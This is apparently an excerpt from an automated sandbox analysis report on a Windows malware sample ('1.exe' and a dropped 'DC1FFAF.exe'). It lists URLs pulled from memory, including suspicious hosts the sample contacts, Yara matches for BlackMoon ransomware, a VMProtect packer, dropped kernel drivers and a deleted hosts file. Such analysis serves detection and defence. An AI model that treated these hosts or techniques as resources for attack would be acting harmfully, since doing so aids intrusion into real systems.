          Source: 1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://www.sina.com.cn/
          Source: 1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://www.sinacloud.com/
          Source: 1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://www.so.com/
          Source: 1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://www.sogou.com/
          Source: 1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://www.sohu.com/
          Source: 1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://www.solidot.org/
          Source: 1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://www.tencent.com/
          Source: 1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://www.tmall.com/
          Source: 1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://www.tudou.com/
          Source: 1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://www.uisdc.com/
          Source: 1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://www.vivo.com.cn/
          Source: 1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://www.west.cn/
          Source: 1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://www.winshang.com/
          Source: 1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://www.x-mol.com/
          Source: 1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://www.xiachufang.com/
          Source: 1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://www.xitongzhijia.net/
          Source: DC1FFAF.exe, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://www.xm2m2.com
          Source: DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://www.xm2m2.comwww.Askm2.comShanghai
          Source: 1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://www.xunlei.com/
          Source: 1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://www.yiche.com/
          Source: 1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://www.yidianzixun.com/
          Source: 1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://www.youth.cn/
          Source: 1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://www.yunzhijia.com/
          Source: 1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://www.zhihu.com/
          Source: 1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://www.zto.com/
          Source: 1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://xianggangcs.oss-accelerate.aliyuncs.com/
          Source: 1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://xiaoman.cn/
          Source: 1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://xinancs.oss-accelerate.aliyuncs.com/
          Source: 1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://xinics.oss-accelerate.aliyuncs.com/
          Source: 1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://xinjiapocs.oss-accelerate.aliyuncs.com/
          Source: 1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmpString found in binary or memory: http://yanzheng.appchizi.com/
          Source: DC1FFAF.exe, 00000002.00000003.2402987601.0000000006543000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://yanzheng.appchizi.com/kss_io/io.php?v=13&b=1&s=10000002
          Source: DC1FFAF.exe, 00000002.00000002.4680189506.000000000651C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://yanzheng.appchizi.com/kss_io/io.php?v=13&b=1&s=10000002&e=get&line=1
          Source: DC1FFAF.exe, 00000002.00000002.4680189506.000000000651C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://yanzheng.appchizi.com/kss_io/io.php?v=13&b=1&s=10000002&e=get&line=1J
          Source: DC1FFAF.exe, 00000002.00000003.2402987601.0000000006543000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://yanzheng.appchizi.com/kss_io/io.php?v=13&b=1&s=10000002)u6
          Source: 1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://youdao.com/
          Source: 1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://zhangjiakoucs.oss-accelerate.aliyuncs.com/
          Source: 1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://zhangjiakoucs.oss-accelerate.aliyuncs.com/http://wulancabucs.oss-accelerate.aliyuncs.com/http
          Source: DC1FFAF.exe, 00000002.00000003.2241627746.0000000007778000.00000004.00000020.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000003.2393357552.0000000007178000.00000004.00000800.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000003.2241627746.000000000776B000.00000004.00000020.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000003.2241627746.0000000007775000.00000004.00000020.00020000.00000000.sdmp, 0CPR6LBX.htm.2.drString found in binary or memory: https://8090cqfz-1251514656.file.myqcloud.com/baxing.htm
          Source: DC1FFAF.exe, 00000002.00000002.4675493919.0000000003E42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://8090cqfz-1251514656.file.myqcloud.com/baxing.htm$
          Source: DC1FFAF.exe, 00000002.00000002.4675493919.0000000003E42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://8090cqfz-1251514656.file.myqcloud.com/baxing.htmR
          Source: DC1FFAF.exe, 00000002.00000002.4718677174.0000000010560000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://8090cqfz-1251514656.file.myqcloud.com/baxing.htmU
          Source: DC1FFAF.exe, 00000002.00000002.4718677174.0000000010560000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://8090cqfz-1251514656.file.myqcloud.com/baxing.htmm
          Source: DC1FFAF.exe, 00000002.00000002.4675493919.0000000003E42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://8090cqfz-1251514656.file.myqcloud.com/baxing.htmt
          Source: 1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmpString found in binary or memory: https://User-Agent:Mozilla/5.0
          Source: DC1FFAF.exe, 00000002.00000003.2216473629.0000000006513000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
          Source: DC1FFAF.exe, 00000002.00000002.4686679559.00000000076B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.ch
          Source: DC1FFAF.exe, 00000002.00000002.4675493919.0000000003E42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svgLMEM
          Source: DC1FFAF.exe, 00000002.00000002.4686679559.00000000076B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://config.edge.
          Source: DC1FFAF.exe, 00000002.00000002.4675493919.0000000003EEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://config.edge.skype.com/config/v1/ODSP_Sync_Client/19.043.0304.0013?UpdateRing=Prod&OS=Win&OSV
          Source: DC1FFAF.exe, 00000002.00000002.4675493919.0000000003EEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
          Source: DC1FFAF.exe, 00000002.00000002.4675493919.0000000003EEF000.00000004.00000020.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000003.2211747868.0000000006513000.00000004.00000020.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4680189506.0000000006510000.00000004.00000020.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4686679559.00000000076B0000.00000004.00000020.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000003.2216473629.0000000006513000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
          Source: DC1FFAF.exe, 00000002.00000002.4675493919.0000000003EEF000.00000004.00000020.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4686679559.00000000076B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5c&
          Source: qmgr.db.4.drString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
          Source: svchost.exe, 00000004.00000003.2196799748.000001BC69D80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
          Source: DC1FFAF.exe, 00000002.00000002.4675493919.0000000003E42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
          Source: DC1FFAF.exe, 00000002.00000002.4686679559.00000000076D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
          Source: DC1FFAF.exe, 00000002.00000002.4686679559.00000000076E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf$
          Source: DC1FFAF.exe, 00000002.00000002.4686679559.00000000076D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2
          Source: DC1FFAF.exe, 00000002.00000002.4686679559.00000000076D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
          Source: DC1FFAF.exe, 00000002.00000002.4675493919.0000000003E92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srfXj
          Source: DC1FFAF.exe, 00000002.00000002.4686679559.00000000076E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srff
          Source: DC1FFAF.exe, 00000002.00000002.4686679559.00000000076E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
          Source: DC1FFAF.exe, 00000002.00000002.4675493919.0000000003E92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.cssLMEM
          Source: DC1FFAF.exe, 00000002.00000002.4675493919.0000000003EEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
          Source: DC1FFAF.exe, 00000002.00000002.4675493919.0000000003E42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.jsLME
          Source: DC1FFAF.exe, 00000002.00000002.4675493919.0000000003E92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.jsLMEM
          Source: DC1FFAF.exe, 00000002.00000002.4675493919.0000000003EEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-09-17-00-05-23/PreSignInSettingsConfig.json?One
          Source: DC1FFAF.exe, 00000002.00000002.4675493919.0000000003EEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-05-06-30-24/PreSignInSettingsConfig.json?One
          Source: DC1FFAF.exe, 00000002.00000002.4675493919.0000000003E42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-05-06-40-12/PreSignInSettingsConfig.json5LME
          Source: DC1FFAF.exe, 00000002.00000002.4675493919.0000000003EEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/update100.xml?OneDriveUpdate=14d1c105224b3e736c3c
          Source: DC1FFAF.exe, 00000002.00000002.4675493919.0000000003EE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/741e3e8c607c445262f3add0e58b18f19e0502af.xml?OneDriveUpdate=7fe112
          Source: DC1FFAF.exe, 00000002.00000003.2241627746.0000000007778000.00000004.00000020.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000003.2393357552.0000000007178000.00000004.00000800.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000003.2241627746.000000000776B000.00000004.00000020.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000003.2241627746.0000000007775000.00000004.00000020.00020000.00000000.sdmp, 0CPR6LBX.htm.2.drString found in binary or memory: https://www.96ydw.com/liebiao/88F410287F3C5C1A
          Source: DC1FFAF.exe, 00000002.00000002.4675493919.0000000003E92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.96ydw.com/liebiao/88F410287F3C5C1A3
          Source: DC1FFAF.exe, 00000002.00000002.4718677174.000000001057E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.96ydw.com/liebiao/88F410287F3C5C1A8g
          Source: DC1FFAF.exe, 00000002.00000002.4718677174.000000001057E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.96ydw.com/liebiao/88F410287F3C5C1A;fg
          Source: DC1FFAF.exe, 00000002.00000002.4718677174.000000001057E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.96ydw.com/liebiao/88F410287F3C5C1AE
          Source: DC1FFAF.exe, 00000002.00000002.4718677174.000000001057E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.96ydw.com/liebiao/88F410287F3C5C1AP
          Source: DC1FFAF.exe, 00000002.00000002.4718677174.000000001057E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.96ydw.com/liebiao/88F410287F3C5C1AYd
          Source: DC1FFAF.exe, 00000002.00000002.4718677174.000000001057E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.96ydw.com/liebiao/88F410287F3C5C1As1d
          Source: DC1FFAF.exe, 00000002.00000002.4686679559.000000000776F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.96ydw.com/liebiao/88F410287F3C5C1Axing.htm7
          Source: DC1FFAF.exe, 00000002.00000003.2255499482.0000000006543000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cctv.com/
          Source: DC1FFAF.exe, 00000002.00000002.4679992769.000000000647A000.00000004.00000020.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000003.2815951601.0000000012310000.00000004.00000020.00020000.00000000.sdmp, 2865ivSJ0.sys.2.drString found in binary or memory: https://www.digicert.com/CPS0
          Source: DC1FFAF.exe, 00000002.00000003.2255499482.0000000006543000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.jmw.com.cn/
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69EB9427 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,2_2_69EB9427

          Spam, unwanted Advertisements and Ransom Demands

          barindex
          Yara detected BlackMoon Ransomware
          Source: Yara matchFile source: 00000002.00000002.4716955883.0000000010412000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: DC1FFAF.exe PID: 420, type: MEMORYSTR
          Source: Yara matchFile source: C:\Users\user\Desktop\EEC3DA20E\CFDEE45078\C2B2CFEA7.dll, type: DROPPED
          Source: Yara matchFile source: C:\Users\user\Desktop\EEC3DA20E\AA23FEB7\DB37C1B99\BD950wrst.dll, type: DROPPED

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: C:\Users\user\Desktop\EEC3DA20E\CFDEE45078\C2B2CFEA7.dll, type: DROPPEDMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
          Source: C:\Users\user\Desktop\EEC3DA20E\AA23FEB7\DB37C1B99\BD950wrst.dll, type: DROPPEDMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
          Detected VMProtect packer
          Source: 38902yywx.dll.2.drStatic PE information: .vmp0 and .vmp1 section names
          PE file has a writeable .text section
          Source: A815rppmj.dll.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeProcess Stats: CPU usage > 49%
          Source: C:\Users\user\Desktop\1.exeMemory allocated: 774C0000 page execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\1.exeMemory allocated: 75A50000 page execute and read and writeJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeMemory allocated: 774C0000 page execute and read and writeJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeMemory allocated: 75A50000 page execute and read and writeJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69E9CCF0 RtlAdjustPrivilege,ZwOpenProcess,ZwOpenProcess,ZwAllocateVirtualMemory,ZwAllocateVirtualMemory,ZwQuerySystemInformation,ZwQuerySystemInformation,ZwFreeVirtualMemory,ZwAllocateVirtualMemory,ZwQuerySystemInformation,ZwOpenProcess,ZwDuplicateObject,ZwQueryInformationProcess,ZwDuplicateObject,ZwClose,ZwFreeVirtualMemory,2_2_69E9CCF0
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69E9CFB0 ZwOpenProcess,ZwAllocateVirtualMemory,ZwAllocateVirtualMemory,ZwQuerySystemInformation,ZwQuerySystemInformation,ZwFreeVirtualMemory,ZwAllocateVirtualMemory,ZwQuerySystemInformation,ZwDuplicateObject,ZwQueryInformationProcess,ZwClose,ZwDuplicateObject,ZwClose,ZwFreeVirtualMemory,2_2_69E9CFB0
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_00442160 NtdllDefWindowProc_A,NtdllDefWindowProc_A,2_2_00442160
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_00471D29 NtdllDefWindowProc_A,2_2_00471D29
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeFile created: C:\Windows\SysWOW64\2865ivSJ0.sysJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeFile created: C:\Windows\SysWOW64\2865ivSJ0.sysJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeFile created: C:\Windows\DC1FFAF.sysJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeFile created: C:\Windows\SysWOW64\BC66DPQaf.sysJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeFile created: C:\Windows\SysWOW64\A16652yzz.sysJump to behavior
          Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeRegistry key value created / modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\PrivacyJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeFile deleted: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69E8B4402_2_69E8B440
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69E8E8E02_2_69E8E8E0
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69E968E02_2_69E968E0
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69ED68B42_2_69ED68B4
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69EAAB002_2_69EAAB00
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69E8EAE02_2_69E8EAE0
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69EC4A682_2_69EC4A68
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69E8CA102_2_69E8CA10
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69E8ECE02_2_69E8ECE0
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69ED4C9A2_2_69ED4C9A
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69EBAC7F2_2_69EBAC7F
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69E9EF502_2_69E9EF50
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69EC4E882_2_69EC4E88
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69EC23102_2_69EC2310
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69E962F02_2_69E962F0
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69EC828E2_2_69EC828E
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69EC42882_2_69EC4288
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69ED42112_2_69ED4211
